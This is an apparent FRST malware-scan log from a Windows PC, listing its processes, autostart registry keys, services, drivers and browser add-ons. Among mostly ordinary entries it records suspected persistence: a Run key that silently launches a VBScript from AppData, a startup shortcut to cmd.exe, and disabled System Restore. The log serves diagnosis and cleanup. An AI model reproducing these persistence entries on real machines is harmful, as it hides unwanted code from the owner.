(ABBYY) C:\Program Files (x86)\Common Files\ABBYY\FineReader\10.00\Licensing\CE\NetworkLicenseServer.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(DameWare Development LLC) C:\Windows\SysWOW64\DNTUS26.EXE
(ESET) C:\Program Files\ESET\ESET Endpoint Antivirus\x86\ekrn.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\HPHotkeyMonitor.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICTUPDATE.EXE
(Cordaware) C:\Program Files (x86)\Cordaware\Infoband\Infoclient.exe
(Cordaware) C:\Program Files (x86)\Cordaware\Infoband\Infoclient.exe
(IBM Corp) C:\Program Files (x86)\IBM\Lotus\Notes\ntmulti.exe
(Softwaremanagement.org) C:\Windows\SysWOW64\SMOmonitorSrv.exe
(Microsoft Corporation) C:\Windows\SysWOW64\CCM\CcmExec.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\hpCMSrv.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(DisplayLink Corp.) C:\Program Files\DisplayLink Core Software\DisplayLinkUserAgent.exe
(Cordaware) C:\Program Files (x86)\Cordaware\Infoband\Infoclient.exe
(Cordaware) C:\Program Files (x86)\Cordaware\Infoband\Infoclient.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\ssonsvr.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(ESET) C:\Program Files\ESET\ESET Endpoint Antivirus\egui.exe
(Broadcom Corporation) C:\Program Files\Broadcom\Broadcom 802.11\WLTRAY.EXE
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Nenad Hrg SoftwareOK) C:\Program Files\SoftwareOK\DesktopOK\DesktopOK_x64.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\pnamain.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\QLBController.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\HPConnectionManager.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [IME14 JPN Setup] => C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEKLMG.EXE [110776 2015-10-13] (Microsoft Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2804976 2013-10-25] (Synaptics Incorporated)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET Endpoint Antivirus\egui.exe [4133072 2012-07-04] (ESET)
HKLM\...\Run: [Broadcom Wireless Manager UI] => C:\Program Files\Broadcom\Broadcom 802.11\WLTRAY.exe [8628224 2014-11-24] (Broadcom Corporation)
HKLM\...\Run: [b] => wscript.exe //B "C:\Users\ADMINI~1\AppData\Roaming\winsc32\b.vbs"
HKLM-x32\...\Run: [IME14 JPN Setup] => C:\Program Files (x86)\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE [81080 2015-10-13] (Microsoft Corporation)
HKLM-x32\...\Run: [IBM Lotus Notes Preloader] => C:\Program Files (x86)\IBM\Lotus\Notes\nntspreld.exe [25480 2011-09-16] (IBM Corp)
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [304568 2010-10-12] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [QLBController] => C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\QLBController.exe [337184 2013-10-16] (Hewlett-Packard Company)
HKLM-x32\...\Run: =>
HKLM-x32\...\Run: [Infoclient] =>
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2015-09-27] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [UseDefaultTile] 1
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig] <===== ATTENTION
HKU\S-1-5-19\...\Run: [Sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
HKU\S-1-5-20\...\Run: [Sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
HKU\S-1-5-21-3459921781-3051252704-3355898513-500\...\Run: [Sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
HKU\S-1-5-21-3459921781-3051252704-3355898513-500\...\Run: [DesktopOK] => C:\Program Files\SoftwareOK\DesktopOK\DesktopOK_x64.exe [349184 2012-01-01] (Nenad Hrg SoftwareOK)
HKU\S-1-5-21-3459921781-3051252704-3355898513-500\...\Run: [b] => wscript.exe //B "C:\Users\ADMINI~1\AppData\Roaming\winsc32\b.vbs"
Lsa: [Notification Packages] scecli c:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
Startup: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update Explorer.lnk [2016-08-21]
ShortcutTarget: Update Explorer.lnk → C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2014-11-24]
ShortcutTarget: Bluetooth.lnk → C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Online Plug-in.lnk [2012-02-29]
ShortcutTarget: Online Plug-in.lnk → C:\Windows\Installer\{0F1F7A90-E71B-4E45-A066-2891619F22E1}\pnaico.exe.20FBBF0A_A7E5_4BDE_9798_9811C3D135AC.exe ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 10.5.53.1 41.79.20.1
Tcpip\..\Interfaces\{601C6FF9-75BD-4CF8-8DF3-D9B9325A6678}: [DhcpNameServer] 10.5.53.1 41.79.20.1

FRST cont.

Internet Explorer:

BHO: Java™ Plug-In SSV Helper → {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} → C:\Program Files\Java\jre1.8.0_77\bin\ssv.dll [2016-05-23] (Oracle Corporation)
BHO: Office Document Cache Handler → {B4F3A835-0E21-4959-BA22-42B3008E02FF} → C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper → {DBC80044-A445-435b-BC74-9C25C1C588A9} → C:\Program Files\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-05-23] (Oracle Corporation)
BHO-x32: Groove GFS Browser Helper → {72853161-30C5-4D22-B7F9-0BBC1D38A37E} → C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: No Name → {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} → No File
BHO-x32: Adobe PDF Conversion Toolbar Helper → {AE7CD045-E861-484f-8273-0445EE161910} → C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2010-10-25] (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler → {B4F3A835-0E21-4959-BA22-42B3008E02FF} → C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper → {DBC80044-A445-435b-BC74-9C25C1C588A9} → C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll => No File
BHO-x32: SmartSelect Class → {F4971EE7-DAA0-4053-9964-665D8EE6A077} → C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2010-10-25] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2010-10-25] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-3459921781-3051252704-3355898513-500 → No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
Handler-x32: saphtmlp - {D1F8BD1E-7967-11D2-B43A-006094B9EADB} - c:\program files (x86)\sap\frontend\sapgui\saphtmlp.dll [2015-07-27] (SAP, Walldorf)
Handler-x32: sapr3 - {D1F8BD1E-7967-11D2-B43A-006094B9EADB} - c:\program files (x86)\sap\frontend\sapgui\saphtmlp.dll [2015-07-27] (SAP, Walldorf)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)

FireFox:

FF Plugin: @java.com/DTPlugin,version=11.77.2 → C:\Program Files\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-05-23] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.77.2 → C:\Program Files\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-05-23] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 → C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 → C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer → C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw.dll [2015-04-17] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=1.6.0_43 → C:\WINDOWS\SysWOW64\npdeployJava1.dll [2014-06-26] (Sun Microsystems, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 → C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 → C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 → C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 → C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 → C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 → C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader → C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-09-27] (Adobe Systems Inc.)
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Endpoint Antivirus\Mozilla Thunderbird
FF Extension: ESET Endpoint Security Extension - C:\Program Files\ESET\ESET Endpoint Antivirus\Mozilla Thunderbird [2014-11-24] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2014-12-09] [not signed]

Chrome:

CHR Profile: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-08-21]
CHR Extension: (Google Search) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-02]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-21]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ABBYY.Licensing.FineReader.Corporate.10.0; C:\Program Files (x86)\Common Files\ABBYY\FineReader\10.00\Licensing\CE\NetworkLicenseServer.exe [814344 2010-05-07] (ABBYY)
R2 DisplayLinkService; C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe [9182096 2013-07-09] (DisplayLink Corp.)
R2 DNTUS26; C:\Windows\SysWOW64\DNTUS26.EXE [120184 2011-05-13] (DameWare Development LLC)
S3 EhttpSrv; C:\Program Files\ESET\ESET Endpoint Antivirus\EHttpSrv.exe [35720 2012-07-04] (ESET)
R2 ekrn; C:\Program Files\ESET\ESET Endpoint Antivirus\x86\ekrn.exe [999704 2012-07-04] (ESET)
S3 ESHASRV; C:\Program Files\ESET\ESET Endpoint Antivirus\EShaSrv.exe [190208 2012-07-04] (ESET)
R2 hpHotkeyMonitor; C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\HPHotkeyMonitor.exe [681760 2013-10-16] (Hewlett-Packard Company)
R2 ImeDictUpdateService; C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICTUPDATE.EXE [83312 2010-10-20] (Microsoft Corporation)
R2 InfoclientUserDesktop; C:\Program Files (x86)\Cordaware\Infoband\Infoclient.exe [1765888 2010-04-20] (Cordaware) [File not signed]
R2 InfoclientWinlogonDesktop; C:\Program Files (x86)\Cordaware\Infoband\Infoclient.exe [1765888 2010-04-20] (Cordaware) [File not signed]
S4 LNSUSvc; C:\Program Files (x86)\IBM\Lotus\Notes\SUService.exe [189832 2011-09-16] (IBM Corp)
S4 Lotus Notes Diagnostics; C:\Program Files (x86)\IBM\Lotus\Notes\nsd.exe [4453768 2011-09-16] (IBM)
R2 Lotus Notes Single Logon; C:\Program Files (x86)\IBM\Lotus\Notes\nslsvice.exe [62856 2011-09-16] (IBM Corp)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 SMOmonitorSrv; C:\WINDOWS\SysWOW64\SMOmonitorSrv.exe [115152 2012-06-18] (Softwaremanagement.org)
S3 smstsmgr; C:\WINDOWS\SysWOW64\CCM\TSManager.exe [246624 2009-09-18] (Microsoft Corporation)
S4 SNMP; C:\Windows\System32\snmp.exe [49664 2010-11-21] (Microsoft Corporation)
S4 SNMP; C:\WINDOWS\SysWOW64\snmp.exe [47616 2010-11-21] (Microsoft Corporation)
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2014-06-24] (Microsoft Corporation)
R2 wltrysvc; C:\Program Files\Broadcom\Broadcom 802.11\bcmwltry.exe [5878272 2014-11-24] (Broadcom Corporation) [File not signed]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [172760 2013-10-02] (Broadcom Corporation.)
R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [494864 2013-08-30] (Intel Corporation)
R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [213416 2012-07-04] (ESET)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [179920 2012-07-04] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [152136 2012-03-29] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [140752 2012-03-29] (ESET)
S3 ew_usbenumfilter; C:\Windows\system32\drivers\ew_usbenumfilter.sys [14976 2014-02-07] (MBB Technologies Co., Ltd.)
S3 FUJ02B1; C:\Windows\system32\drivers\FUJ02B1.sys [7808 2010-12-08] (FUJITSU LIMITED)
S3 FUJ02E3; C:\Windows\system32\drivers\FUJ02E3.sys [7296 2010-12-08] (FUJITSU LIMITED)
S3 hwdatacard; C:\Windows\system32\drivers\ewusbmdm.sys [226048 2014-02-07] (MBB Technologies Co., Ltd.)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2014-01-24] (Intel Corporation)
S3 iaStorS; C:\Windows\system32\drivers\iaStorS.sys [639408 2012-03-31] (Intel Corporation)
R0 ioatdma; C:\Windows\System32\Drivers\ioatdma.sys [46792 2009-11-16] (Intel Corporation)
S3 ioatdma1; C:\Windows\System32\Drivers\qd160x64.sys [40144 2009-11-16] (Intel Corporation)
S3 ioatdma2; C:\Windows\System32\Drivers\qd260x64.sys [41168 2009-11-16] (Intel Corporation)
R3 ISCT; C:\Windows\System32\DRIVERS\ISCTD64.sys [46568 2013-08-13] ()
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-08-21] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64896 2016-03-10] (Malwarebytes Corporation)
S3 megasas2; C:\Windows\system32\drivers\megasas2.sys [51496 2012-01-17] (LSI Corporation)
S3 megasr1; C:\Windows\system32\drivers\megasr1.sys [809768 2012-03-29] (LSI Corporation, Inc.)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
S3 O2MDRDR; C:\Windows\system32\drivers\o2mdx64.sys [58400 2010-12-17] (O2Micro )
R3 prepdrvr; C:\WINDOWS\SysWOW64\CCM\prepdrv.sys [26992 2009-09-18] (Microsoft Corporation)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [28416 2008-04-16] (Research In Motion Limited)
S3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [465624 2014-01-03] (Realsil Semiconductor Corporation)
R3 rtsuvc; C:\Windows\System32\DRIVERS\rtsuvc.sys [8876248 2013-11-14] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\Windows\system32\drivers\Smb_driver_AMDASF.sys [30448 2013-10-25] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [34544 2013-10-25] (Synaptics Incorporated)
S3 swivsp; C:\Windows\system32\drivers\swivspnt.sys [23552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX00; C:\Windows\system32\drivers\swumx00.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 swumx12; C:\Windows\system32\drivers\swumx12.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX20; C:\Windows\system32\drivers\swumx20.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX21; C:\Windows\system32\drivers\swumx21.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX22; C:\Windows\system32\drivers\swumx22.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX32; C:\Windows\system32\drivers\swumx32.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX33; C:\Windows\system32\drivers\swumx33.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX3A; C:\Windows\system32\drivers\swumx3a.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX3B; C:\Windows\system32\drivers\swumx3B.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX3C; C:\Windows\system32\drivers\swumx3C.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX3D; C:\Windows\system32\drivers\swumx3D.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX3E; C:\Windows\system32\drivers\swumx3e.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX40; C:\Windows\system32\drivers\swumx40.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX50; C:\Windows\system32\drivers\swumx50.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX51; C:\Windows\system32\drivers\swumx51.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX52; C:\Windows\system32\drivers\swumx52.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX53; C:\Windows\system32\drivers\swumx53.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX54; C:\Windows\system32\drivers\swumx54.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX55; C:\Windows\system32\drivers\swumx55.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX56; C:\Windows\system32\drivers\swumx56.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX57; C:\Windows\system32\drivers\swumx57.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX58; C:\Windows\system32\drivers\swumx58.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX59; C:\Windows\system32\drivers\swumx59.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX5A; C:\Windows\system32\drivers\swumx5A.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX70; C:\Windows\system32\drivers\swumx70.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX71; C:\Windows\system32\drivers\swumx71.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX80; C:\Windows\system32\drivers\swumx80.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX81; C:\Windows\system32\drivers\swumx81.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX82; C:\Windows\system32\drivers\swumx82.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX90; C:\Windows\system32\drivers\swumx90.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX91; C:\Windows\system32\drivers\swumx91.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX92; C:\Windows\system32\drivers\swumx92.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX93; C:\Windows\system32\drivers\swumx93.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMXA3; C:\Windows\system32\drivers\swumxa3.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 vna_ap; C:\Windows\System32\DRIVERS\vnaap.sys [161256 2009-02-15] (Check Point Software Technologies)
S3 e1express; system32\DRIVERS\e1e6232e.sys
S3 e1yexpress; system32\DRIVERS\e1y62x64.sys
S3 VGPU; System32\drivers\rdvgkmd.sys

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-21 10:24 - 2016-08-21 10:25 - 00026428 _____ C:\Users\Administrator\Downloads\FRST.txt
2016-08-21 10:22 - 2016-08-21 10:24 - 00000000 ____D C:\FRST
2016-08-21 10:05 - 2016-08-21 10:05 - 00000000 ____D C:\Users\Administrator\AppData\Local\ESET
2016-08-21 09:54 - 2016-08-21 09:57 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-08-21 09:53 - 2016-08-21 09:53 - 00001068 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-08-21 09:53 - 2016-08-21 09:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-08-21 09:53 - 2016-08-21 09:53 - 00000000 ____D C:\ProgramData\Malwarebytes
